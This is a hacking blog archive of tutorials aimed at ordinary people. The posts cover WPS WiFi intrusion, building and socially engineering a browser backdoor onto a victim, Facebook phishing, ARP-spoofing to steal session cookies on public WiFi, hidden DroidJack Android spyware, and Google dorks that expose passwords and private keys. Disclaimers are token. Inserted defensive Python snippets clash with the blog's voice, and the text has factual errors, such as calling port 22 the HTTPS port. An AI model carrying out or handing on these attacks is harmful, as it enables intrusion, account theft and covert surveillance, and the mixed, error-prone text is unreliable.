Category Archives: Hacking

THIS BLOG WILL BE DISCONTINUED SOON : MOVING TO NEW ONE

REQUESTING ALL MY USERS, TO VISIT MY NEW BLOG at eBLOGGER with the same name
I.E MANISH HACKS.


Due to some problems, I can’t continue posting on this blog.

Please subscribe to my new blog too to stay updated on the new posts there, and also to my YouTube channel named Manish Hacks, and don’t forget to hit the bell icon to be notified about my new video tutorials…

Visit my new Blog Now, Manish Hacks

Thank You!!!!

Hack Any WPA2/WEP/WPA Wifi Using Dumpper And Jumpstart [Latest Trick]

Step By Step Guide To Use WinPcap, Dumpper And JumpStart and Get Password:

Download the Dumper File Here

WinPcap: Download here

JumpStart: Download here

 

NOTE: You need to have Microsoft .NET Framework installed on your computer as well, or this will not work.

 

Disclaimer: I (The creator of the post has already stated this, but I’d like to go over it again) do not take any responsibility for your actions regarding this tutorial. This was made by the creator to demonstrate weaknesses in wireless networks and for educational purposes only. Breaching other people’s wireless networks without permission is against the law. If you want to test this tutorial, try it on your own home network.


We will be using Dumpper and Jumpstart and other suites to hijack WPA2/WEP/WPA WiFi networks. It’ll let you join without a password, then you can get the password from inside the network. I’ll show you how towards the end of the tutorial. First, download all of the programs above. Now, follow these instructions for setting it up:

 

Note: Don’t stop the process. It takes several minutes, probably 4~5 hours. (Works only on laptops.)

Update: We have also added the process to hack WiFi on desktops below.

 

Hack WiFi with Dumpper and Jumpstart:

Download and install JumpStart, WinPcap, and Dumpper

Open Dumpper. It’ll be in Spanish, so go to the far right tab and select ‘English’ from between the other two options. Your programs are now set up and ready to go, so begin the process:

 

  • In the ‘Networks’ tab, select the network adapter you wish to use, then hit the ‘Scan’ button.
  • After the scan completes, go over to the ‘Wps’ tab. In the area that says ‘Connect using JumpStart’, hit ‘Browse’ to select the location where you installed JumpStart in the set-up steps above. (By default it installs in C:\Program Files (x86)\Jumpstart. Don’t open it, just select the ‘Jumpstart’ folder and click ‘OK’.)
  • In the area ‘Show default pin’, select ‘All networks’ instead of ‘Only known networks’.
  • Hit the ‘Scan’ button.
  • Select the network you wish to penetrate. Note the ‘Pin’ shown next to your network in the scan results; it will be needed later.
  • Back in the ‘Connect using Jumpstart’ area, hit the ‘Start JumpStart’ button.
  • Under ‘What do you want to do?’, select ‘Join a wireless network’ and hit ‘Next’.
  • Under ‘Which setup method do you want to use?’, select “Enter the PIN from my access point” and enter the PIN shown next to your network in the earlier scan results.
  • Finally, select the targeted network from before and hit ‘Next’. Now you’re happily connected to that WiFi network you just penetrated. Do you want to see the password so you can get on from other devices without repeating this process? Sure! Follow these simple steps:
  • Open the menu where you join WiFi networks/view the network you’re connected to.
  • Right click on the network you just joined and hit ‘Properties’.
  • Under the ‘Security’ tab, you can see the password, but it’s just dots. Check the ‘Show characters’ box under it.
  • The password will then reveal itself.

Done.

 

Hacking the WiFi on Desktops?
Many people are trying this hack on their desktops, but unfortunately desktops are not compatible with it. Don’t worry, here is the trick to do the same hacking process on desktops too: you just need to buy a wireless adapter and install it in your desktop.

It is worth it, and it is the only other thing you need. After getting the adapter, proceed as above to hack WiFi with Dumpper and Jumpstart. You will not regret buying it.

Doubts? Please use the comments section and feel free to ask any question. I will definitely get it solved.

 

HACK REMOTE PC USING BROWSER – JAVASCRIPT WEBSOCKET BACKDOOR

BrowserBackdoor is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.


BrowserBackdoorServer is a WebSocket server that listens for incoming WebSocket connections and creates a command-line interface for sending commands to the remote system.

The JavaScript backdoor in BrowserBackdoor can be used on all browsers that support WebSockets.

First, clone the browser-backdoor repository from GitHub; to do so type:

git clone https://github.com/IMcPwn/browser-backdoor.git


Follow the below steps one by one:

cd client

npm install


Now go to the client folder, open the index.html file in Leafpad and edit the following line: enter your Kali Linux IP address (the screenshot is given below).

After finishing the above task, it will create the Browser backdoor script folder for Windows and Linux users.


Now type the following commands step by step:

npm install electron-packager -g

electron-packager . --all


Now go to the server folder in the browser-backdoor directory and run the following command:

bundle install


After that start browser backdoor by typing in terminal:

ruby bbsconsole.rb

Now send Browserbackdoor-win32-x64 to the victim using any social engineering method. When the victim clicks on the BrowserBackdoor file, you get the victim’s session; an example is given below.

Now type the session command to check the active sessions; it will show you each session with its id number.

Type the target command with the session id to interact with the current session, as in the following example:

target 0

Now, if you want more options, type the help command to get the list of all available commands.


NOTE: This post is only to make people aware of this backdoor, i.e. for educational purposes only.

 

CREDENTIALS HARVESTER ATTACK : HACK FACEBOOK

Do you know you can hack a Facebook password with one fake FB page (phishing)?

In this tutorial we will use the Social Engineering Toolkit’s Credential Harvester attack in Kali Linux.
All you need to do is follow the tutorial as it is to see the Credential Harvester in action.

WHAT IS CREDENTIALS HARVESTER ATTACK ?

It is part of the SOCIAL ENGINEERING TOOLKIT. In this method the attack starts with the creation of a phishing page. The attacker sets the post-back IP address to receive credentials such as usernames and passwords. The attacker can shorten the IP address to make it look like a genuine URL. When the victim visits the URL and enters their login details, the post-back feature of the page sends all the data to the attacker.

Brute-Force Authentication Attack With Burp Suite

Authentication lies at the heart of an application’s protection against unauthorized access. If an attacker is able to break an application’s authentication function then they may be able to own the entire application.


The following tutorial demonstrates a technique to bypass authentication using a simulated login page from the “Mutillidae” training tool. The version of “Mutillidae” we are using is taken from OWASP’s Broken Web Application Project. Find out how to download, install and use this project.

First, ensure that Burp is correctly configured with your browser.

In the Burp Proxy tab, ensure “Intercept is off” and visit the login page of the application you are testing in your browser.


Return to Burp.

In the Proxy “Intercept” tab, ensure “Intercept is on”.


In your browser enter some arbitrary details in to the login page and submit the request.


The captured request can be viewed in the Proxy “Intercept” tab.

Right click on the request to bring up the context menu.

Then click “Send to Intruder”.

Note: You can also send requests to the Intruder via the context menu in any location where HTTP requests are shown, such as the site map or Proxy history.


Go to the Intruder “Positions” tab.

Clear the pre-set payload positions by using the “Clear” button on the right of the request editor.

Add the “username” and “password” parameter values as positions by highlighting them and using the “Add” button.

Change the attack to “Cluster bomb” using the “Attack type” drop down menu.


Go to the “Payloads” tab.

In the “Payload sets” settings, ensure “Payload set” is “1” and “Payload type” is set to “Simple list”.

In the “Payload options” settings enter some possible usernames. You can do this manually or use a custom or pre-set payload list.


Next, in the “Payload Sets” options, change “Payload” set to “2”.

In the “Payload options” settings enter some possible passwords. You can do this manually or using a custom or pre-set list.

Click the “Start attack” button.


In the “Intruder attack” window you can sort the results using the column headers.

In this example sort by “Length” and by “Status”.


The table now provides us with some interesting results for further investigation.

By viewing the response in the attack window we can see that request 118 is logged in as “admin”.


To confirm that the brute force attack has been successful, use the gathered information (username and password) on the web application’s login page.


Account Lock Out


In some instances, brute forcing a login page may result in the application locking out the user account. This could be due to a lockout policy based on a certain number of bad login attempts, etc.

Although designed to protect the account, such policies can often give rise to further vulnerabilities. A malicious user may be able to lock out multiple accounts, denying access to a system.

In addition, a locked out account may cause variances in the behavior of the application; this behavior should be explored and potentially exploited.

Verbose Failure Messages


Where a login requires a username and password, as above, an application might respond to a failed login attempt by indicating whether the reason for the failure was an unrecognized username or incorrect password.

In this instance, you can use an automated attack to iterate through a large list of common usernames to enumerate which ones are valid.

A list of enumerated usernames can be used as the basis for various subsequent attacks, including password guessing, attacks on user data or sessions, or social engineering.
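A defender’s view of the two weaknesses just described, added here as example code that is not from the PortSwigger article: a login routine whose distinct failure messages make username enumeration trivial, beside a hardened version that returns one generic message, compares digests in constant time, and throttles per source and account instead of hard-locking the account (which would hand anyone a denial of service). The user store, salt and passwords are constructed placeholders.

```python
import hashlib
import hmac
import time
from collections import defaultdict, deque

# Constructed sample user store (not real credentials): username -> (salt, PBKDF2 digest).
# PBKDF2 via hashlib is used so the example runs on the standard library alone.
_ITER = 10_000
_SALT = b"constructed-salt"


def _digest(password, salt=_SALT):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITER)


USERS = {"admin": (_SALT, _digest("correct horse"))}
# Placeholder record so an unknown username costs the same hashing work as a known one.
_DUMMY = (_SALT, _digest("placeholder"))

GENERIC_FAILURE = "Invalid username or password"
THROTTLED = "Too many attempts; try again later"


def verbose_login(username, password):
    """Weak form: the two distinct messages (and their different lengths) are exactly
    what sorting Intruder results by Length or Status exposes, so valid usernames can
    be enumerated before any password is guessed."""
    if username not in USERS:
        return False, "Unknown username"
    salt, digest = USERS[username]
    if _digest(password, salt) != digest:
        return False, "Incorrect password"
    return True, "Welcome"


class Throttle:
    """Sliding-window failure counter keyed on (source IP, username).

    A temporary, per-source delay slows guessing without the hard lockout that lets
    anyone deny service to a legitimate account simply by submitting bad passwords."""

    def __init__(self, limit=5, window=60.0, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window, clock
        self.failures = defaultdict(deque)

    def blocked(self, key):
        now, q = self.clock(), self.failures[key]
        while q and now - q[0] > self.window:  # drop failures outside the window
            q.popleft()
        return len(q) >= self.limit

    def record_failure(self, key):
        self.failures[key].append(self.clock())

    def reset(self, key):
        self.failures.pop(key, None)


def hardened_login(username, password, source_ip, throttle):
    """One failure message for every reason, a constant-time comparison, and equal
    hashing cost for known and unknown usernames, so neither the response nor its
    timing says which half of the credential was wrong."""
    key = (source_ip, username)
    if throttle.blocked(key):
        return False, THROTTLED
    salt, digest = USERS.get(username, _DUMMY)
    candidate = _digest(password, salt)
    if username in USERS and hmac.compare_digest(candidate, digest):
        throttle.reset(key)
        return True, "Welcome"
    throttle.record_failure(key)
    return False, GENERIC_FAILURE
```

In a real deployment the counter lives in a shared store and the PBKDF2 work factor is far higher; the point here is the shape of the responses, not the in-memory bookkeeping.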

Scanning a login page


In addition to manual testing techniques, Burp Scanner can be used to find a variety of authentication and session management vulnerabilities.

In this example, the Scanner was able to enumerate a variety of issues that could help an attacker break the authentication and session management of the web application.

 

SOURCE: PortSwigger

COOKIES STEALING: HACK FACEBOOK SESSIONS

Today we’ll be hacking Facebook profiles active on your local network.
You may think, “How is this useful, nobody but me is using my network.” Well, you can use this on other Wi-Fi networks that are available for free (like at Starbucks) and crack their precious Facebook profile!
 


How?

We are going to use a well known method called “The cookie injection method.” This might be far off from becoming “elite”, but you need to get familiar with your Linux distribution first.

Step 1: Get the Right “Stuff”

For this hack, you’ll need a few things. Nothing special, but you’ll need these.

My best suggestion is that you first install BackTrack, Kali Linux, or Bugtraq because they have almost everything we need.

For this little magic trick, we’ll need:

  • A working Linux distribution (preferably Kali, Backtrack or Bugtraq)
  • Wireshark (a packet sniffer)
  • Firefox (web browser)
  • Nmap (scanner)
  • Greasemonkey (addon for Firefox)
  • Cookie injector (script for Greasemonkey)

Now let’s start doing some magic! :D

Step 2: Network Scan

First, to actually connect to a target, we’ll need an IP address. In order to get that, you’ll need to do a network scan with Nmap. So go ahead and boot up your terminal and enter the following command:

  • nmap -F 192.168.xx.xx/24

Note: If this doesn’t work, use 10.0.x.x/24 instead.

This command will scan your network for any IP addresses connected to it. The -F gives the console the instruction to use “Fast mode.” If done correctly, you should see something like this:

 


That’s what your Nmap scan should look like.

Step 3: Starting the “Man-in-the-Middle Attack”

Now we’re going to start a man-in-the-middle attack, MITM for short.

In a MITM attack, we spoof MAC addresses (via ARP) so that traffic between the target and the gateway passes through us: when one party sends a message to the other, it does not reach them directly but arrives at our machine first, and the other side only receives what we forward on, as we’re the man in the middle.

This might help you understand:


A man-in-the-middle attack!

Starting the Attack

To start, enter the following command in a NEW terminal window:

  • echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

This enables IP forwarding on your machine, so the traffic you intercept is passed on rather than dropped (a plain sudo echo with a shell redirection does not work, because the redirection is opened by your unprivileged shell, not by sudo). Now we’re starting the MITM by opening a NEW terminal window and entering this command:

  • sudo arpspoof -i [Interface] -t [target] [default gateway]

If you don’t know your interface and default gateway, start a new terminal and enter ifconfig (and ip route for the gateway); ipconfig is the Windows equivalent.

This is the result from the arpspoof.

Open (once again -_-) a new terminal window and enter the following command:

  • sudo arpspoof -i [interface] -t [default gateway] [target]


Another result from the arpspoof!

Note: After you entered both the arpspoof commands DON’T CLOSE THE TERMINALS.
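From the defender’s side, the ARP poisoning started above leaves a visible trace in the victim’s neighbour table: the gateway IP suddenly maps to a different MAC, and one MAC answers for several IPs. The following is added example code, not part of the original post, that parses Linux ip neigh show output (constructed sample lines, assumed to follow the standard iproute2 format) and flags both signs.

```python
import re
from collections import defaultdict

# One line of Linux `ip neigh show` output (assumption: standard iproute2 format);
# entries without an lladdr (INCOMPLETE/FAILED) deliberately do not match.
_NEIGH = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) dev (?P<dev>\S+) lladdr "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)


def parse_neigh(text):
    """Return [(ip, mac), ...] with MACs lower-cased; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = _NEIGH.match(line.strip())
        if m:
            entries.append((m.group("ip"), m.group("mac").lower()))
    return entries


def find_duplicate_macs(entries):
    """MACs that answer for more than one IP. While arpspoof runs, the spoofing host's
    MAC shows up both for its own address and for the gateway (or the target)."""
    by_mac = defaultdict(set)
    for ip, mac in entries:
        by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def check_gateway(entries, gateway_ip, expected_mac):
    """Compare the gateway's current MAC against one pinned while the network was clean.
    Returns the unexpected MAC on mismatch, otherwise None."""
    current = dict(entries).get(gateway_ip)
    if current is not None and current != expected_mac.lower():
        return current
    return None


def audit(text, gateway_ip, expected_mac):
    """Run both checks over neighbour-table text and return human-readable findings."""
    entries = parse_neigh(text)
    findings = []
    bad = check_gateway(entries, gateway_ip, expected_mac)
    if bad:
        findings.append(f"gateway {gateway_ip} now resolves to {bad}, expected {expected_mac}")
    for mac, ips in find_duplicate_macs(entries).items():
        findings.append(f"{mac} claims {len(ips)} addresses: {', '.join(ips)}")
    return findings


# Constructed sample tables (not captured from a real network). The second is what a
# victim sees while the two arpspoof commands above run from 192.168.1.50.
CLEAN = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.1.23 dev wlan0 lladdr 00:11:22:33:44:23 STALE
192.168.1.50 dev wlan0 lladdr 00:11:22:33:44:50 STALE
"""
SPOOFED = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:50 REACHABLE
192.168.1.23 dev wlan0 lladdr 00:11:22:33:44:23 STALE
192.168.1.50 dev wlan0 lladdr 00:11:22:33:44:50 STALE
192.168.1.77 dev wlan0  FAILED
"""

if __name__ == "__main__":
    for finding in audit(SPOOFED, "192.168.1.1", "00:11:22:33:44:01"):
        print("ALERT:", finding)
```

Pinning the gateway MAC as a static ARP entry on the client, or enabling dynamic ARP inspection on managed switches, turns this after-the-fact check into prevention.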

Step 4: Firefox and Wireshark (Almost Done!)

We need a few more things in order to complete this hack!

First install Firefox, then Greasemonkey and the cookie injector script. Then, install Wireshark, which you can do by entering this command into a terminal window:

  • sudo apt-get install wireshark

After that, open up a Wireshark session (open a terminal and enter sudo wireshark as the command). Select your interface and start capturing. At the top, you should see an input box where you can add filters. Now enter this filter:

  • http.cookie contains DATR

Now you should get a list in Wireshark. Search for a cookie that contains the text GET. Locate it, click on it with the left mouse button, select copy, select bytes, select printable text only.


Wireshark result. The one you need is in the black circle.

Now go to Firefox and go to Facebook. Make sure you’re NOT logged in. If you are, go to settings and delete all the cookies. Then go back to the Facebook log-in page, press [ALT]+C, and paste the cookie. Press OK and refresh the page.


Here you can clearly see the cookie injector script input box.

If my magic worked, you should see the main Facebook timeline. If not, then you’ve done something wrong.

My Final Comments

This hack may seem advanced, but it’s actually really easy. Once you break down all the steps, it’s a piece of cake! 😀

Now that you’ve done this, it should be clear that Facebook security isn’t very strong 😛

Quick note: This only works if your target is actually browsing through Facebook over http (not https) at the time you’re doing the hack.

Note: All contents are provided for educational purposes only. 

External Links:

Greasemonkey: https://addons.mozilla.org/en-US/firefox/addon/748
HTTP Protocol: http://en.wikipedia.org/wiki/HTTP
TCP Protocol: http://en.wikipedia.org/wiki/TCP
Cookies: http://en.wikipedia.org/wiki/HTTP_cookie
Wireshark: http://www.wireshark.org/
Ettercap: http://ettercap.sourceforge.net/
ARP Poisoning: http://en.wikipedia.org/wiki/ARP_spoofing

 

How to Setup SSH Tunneling to Bypass a Firewall

Today, data breaches, hacking and snooping are happening frequently. Not a day goes by without news of a company’s database getting leaked or some government censoring or controlling more part of the internet. And there is always a Nigerian prince wanting your help to free his million dollar assets.

To protect your identity and other sensitive information from all these, you need to secure your browsing, especially when using a public WiFi network. The ideal solution is using a VPN which we have already covered on several instances.


But what if you are behind an office, library or school firewall? A VPN will work (sometimes), but the services are paid and the free ones have dark sides. SSH tunnelling is one alternative which enables you to bypass a restrictive firewall without getting caught.

What is SSH Tunneling?

SSH tunnelling is somewhat like a VPN. With a VPN, you connect to a VPN server and all your traffic is encrypted and routed through that server. The premise is the same, but instead of a VPN server you have your home PC or router acting as the server for traffic routing, and it takes a few more steps to set up.


For readers who like technical details, the client side computer will connect to an SSH server through port 22. Most firewalls allow communication over port 22, as it is the port used by HTTPS, and they cannot decipher what is being transmitted over the HTTPS connection as it’s encrypted. SSH also uses the same port, so most firewalls allow it. I say most because some really good ones can still catch it, for which read the cautionary note below.

 

A Word of Caution
Before you start poking around in the network settings at your workplace, review its policy regarding this. Depending on the company, you will at best get a warning or at worst get fired. Moreover, if you work in a company involving sensitive work, like a government department, bank or nuclear power station, it is wise not to do this as it may lead to compromised security, leading to some of the aforementioned hacks. If an IT admin decides to inspect, he or she will only see traffic flowing via port 22 to and from your PC but will not be able to see what the traffic is, due to encryption. So if you get caught and rebuked for trying this, no fingers should be pointed at us.
Moreover, it’s not guaranteed that this method will penetrate all firewalls. Most firewalls allow it because they can’t differentiate between an SSH and an HTTPS packet. But a really sophisticated firewall will sniff this out and block the connection.

 

The Server Side: FreeSSHD

In a VPN connection you connect to a VPN server; in the same way, in SSH tunnelling you need an SSH server. There are free SSH servers available, but as our main concern here is security, it’s not wise to trust an unknown entity with your data. So we will be setting up a server on the home PC. Hosting an SSH server doesn’t require powerful hardware, so any old or low-cost PC is good enough for the job. FreeSSHD is the free app we will use. Let’s set it up.

Step 1: Download and install FreeSSHD. At the end of the installation, select Yes for Private Keys and select No for Do you want to run FreeSSHd as a system service.

Step 2: Open FreeSSHD and open the settings window by double clicking the icon in the taskbar. There should be a green tick indicating SSH server is running.


Step 3: Click the Users tab > Add to add a new user. In the newly opened window, enter the username of your choice. In Password, select Password stored as SHA1 hash from the drop down menu and enter a password of your liking. Tick the check boxes for Shell & Tunneling.


Step 4: In the Encryption tab select the AES(128,192 and 256 bits) option, then click the SSH and Tunneling tabs and modify the options as per the images below.


Settings for SSH tab


Settings for Tunneling Tab

The Client Side: PuTTY

To connect to the SSH server, a client app is required. For that, we will be using the awesome and free PuTTY client app. It’s simple and doesn’t require installation, perfect for work PCs which usually don’t let you install programs.

Download and open PuTTY. In the Host Name enter the IP address or hostname of the PC on which SSH server is running, select SSH under Protocol and click on Open. A black window will appear asking you to enter the username. This means the connection to the SSH server is successful. Enter the username you set in Step 3 followed by the password (which will not appear as you type).


If you get connection refused or connection timed out error, follow the next steps to allow the port in Windows firewall.

Open the Windows firewall (on the FreeSSHD server PC) and go to Advanced Settings. In the Advanced Settings window click on Inbound Rules > New Rule. Now follow the steps as per the screenshots below.


Select Port for the type of rule.


Select TCP and enter 22 for port number.


Select Allow the connection.

Tick all three options.

If you still get a connection error, try to ping your SSH server from CMD. If you get a request timed out message then most probably the firewall is tightly secured and, unfortunately, you can’t do anything.

How To Hack Android Smartphones Remotely using DroidJack To Get Full Access

I have already posted about How to Hack Android Phone using Metasploit, where you can see how easily anyone can hack an Android smartphone using Metasploit, but the whole thing was in Linux and not everyone is used to working on Linux.

So, this post will show you how to hack Android smartphones on Windows using DroidJack. The whole process is GUI based and easy.

What is Droid Jack ?


Droid Jack is what you need for that. Droid Jack gives you the power to establish control over your beloveds’ Android devices with an easy to use GUI and all the features you need to monitor them. Droid Jack is a client/server application developed in Java Android for the client side and in Java/Swing for the server.

NOTE: Here I’m using RAT (remote administration tool) software on Windows for educational use; all devices have been faked. This tutorial is for learning purposes only and should not be used for any illegal activities. It’s only for awareness. Don’t break the privacy of someone who does not belong to you; I’m not liable for any illegal activity…

Requirements :

  • PC running Windows with Internet enabled.
  • Java and .NET Framework installed.

Features of this Android HACK :

  • Get contacts from remote android device.
  • Click snaps using front or back camera.
  • Get real-time pin point location.
  • Record real-time sound by using microphone of android device.
  • and lots more…….

Hack Android using Droid Jack

Step 1 : Download Droid Jack from here .

Step 2 : Now open Droid Jack.jar and create a new .apk file from the “Generate apk” tab. Now edit the fields; here I’m using

App name : stack4

File name : stack4

Dynamic DNS : 192.168.1.4 (lan ip)

Port : 1337 (you can use any port but it should be available or open for listening)

Bind with another apk : Leaving blank. You can bind this apk with another apk like WhatsApp, Viber, or any other Android package. Here I’m not using this feature.

Stealth mode : Leaving blank. You can hide this app from the launcher, making it hidden.

Use custom icon : Leaving blank. Use a desired app icon.


Step 3 : After successfully generating the new apk, send it to the Android device.


Step 4 : Now click on the ‘Devices’ tab. Enter your port and turn on reception.


Step 5 : Open the app on the Android device. As soon as you open the app on the device, you can see the connected device in the DroidJack device console.

See also : How to root android without PC

Step 6 : Now you have full access over the victim’s device. You can grab messages, call log, pinpoint location, listen to real time calls, access data from the file manager and much more.

Known Bugs
Bug: Unable to Fetch Data from Device
Fix: Forward both your chosen port AND port 1334!
Status: Working

For full version software, mail me, or drop your e-mail in comments.

If you have any doubt about your device security ,please feel free to ask.

How to use Google.com to Find Usernames + Passwords


Prerequisites:

1. A modern web browser and an internet connection.
2. Time

Method 1: Facebook

We will be using a google dork to find usernames and passwords of many accounts including Facebook!

The Dork: intext:charset_ test= email= default_persist ent=

Enter that into Google, and you will be presented with several sites that have username and passwords lists!

Method 2: WordPress!

This will look for WordPress backup files, which contain the passwords and all data for the site!

The Dork: filetype:sql inurl:wp-conten t/backup

Method 3: WWWBoard!

This will look for the user and passwords of WWWBoard users

The Dork: inurl:/ wwwboard/ passwd.txt

Method 4: FrontPage!

This will find all users and passwords, similar to above.

The Dork: ext:pwd inurl:(service | authors | administrators | users)”# -FrontPage-“

Method 5: Symfony

This finds database information and logins

The Dork: inurl:config/ databases.yml -trac -trunk -“Google Code”-source -repository

Method 6: TeamSpeak

This will search for the server.dbs file
(A Sqlite database file With the SuperAdmin username and password)

The Dork: server-dbs”intitle:index of”

Method 7: TeamSpeak 2
This will find the log file which has the Super Admin user and pass in the top 100 lines. Look for “superadmin account info:”

The Dork: “inurl:Teamspea k2_RC2/ server.log

Method 8: Get Admin pass
Simple dork which looks for all types of admin info

The Dork: “admin account info”filetype:log

Method 9: Private keys
This will find any .pem files which contain private keys.

The Dork: filetype:pem pem intext:private

And the Ultimate one, the regular directory full of passwords.

Method 10: The Dir of Passwords!
Simple one!

The Dork: intitle:”Index of..etc”passwd

ENJOY HACKING!

Use at your own risk!

Hack .rar files by using RAR Password Unlocker


Efficient and Secure WinRAR/RAR Password Recovery

RAR Password Unlocker has proved to be a helpful tool when you have forgotten a WinRAR/RAR password and cannot open the RAR archive. It can recover the RAR password at high speed via 3 attack options: Brute-force, Brute-force with user-defined Mask and Dictionary.

  • Support all RAR files created by any tools
  • Recover RAR password faster with SSE, etc.
  • Support multi-core CPU and GPU acceleration
  • 3 efficient password attack options available
  • Save password recovery process automatically
  • Shut down computer automatically after recovery

Key Features:

  • Powerful WinRAR Recovery Tool

Quickly recover forgotten passwords from encrypted RAR archives (*.rar) created by any applications, including the latest version of WinRAR. Unlock any password-protected RAR archive no matter what compression and encryption algorithm is used.

  • Recover Fast with GPU & Multi-core CPU

Recover RAR password at high speed by using advanced SSE technology and new search algorithm.

Allow you to accelerate RAR password recovery with Multi-core CPUs, NVIDIA CUDA GPUs and ATI OpenCL GPUs.

  • 3 Efficient Password Attack Options

Brute-force Attack – Try all possible password combinations when you have no idea about it.

Brute-force Attack with Mask – Greatly reduce the recovery time by specifying the forgotten password length, character set, etc. (Highly recommended)

Dictionary Attack – Recover lost RAR password by trying the password combinations in the built-in dictionary as a password. Self-created dictionary in any language is also supported.

  • Search for Encrypted Files

Search feature helps you find your encrypted RAR archives easily and fast by scanning your PC. You can select the type of scan you want to use and scan specific files – from your entire computer system to one or two selected folders.

  • Auto-save Recovery State

Stop and resume your password recovery process anytime through the auto-save feature. This RAR password cracker can automatically save your password recovery state.

System Requirements:

OS: Windows 7/ Vista/XP/2008/2003/2000

CPU: 1 GHz processor (2.4 GHz is recommended)

RAM: 512 MB (1 GB is recommended)

Disk space: 15 MB of free space

Download full version from this link

Also Read: CRACK ANY RAR/ZIP FILE PASSWORD WITHOUT ANY SOFTWARE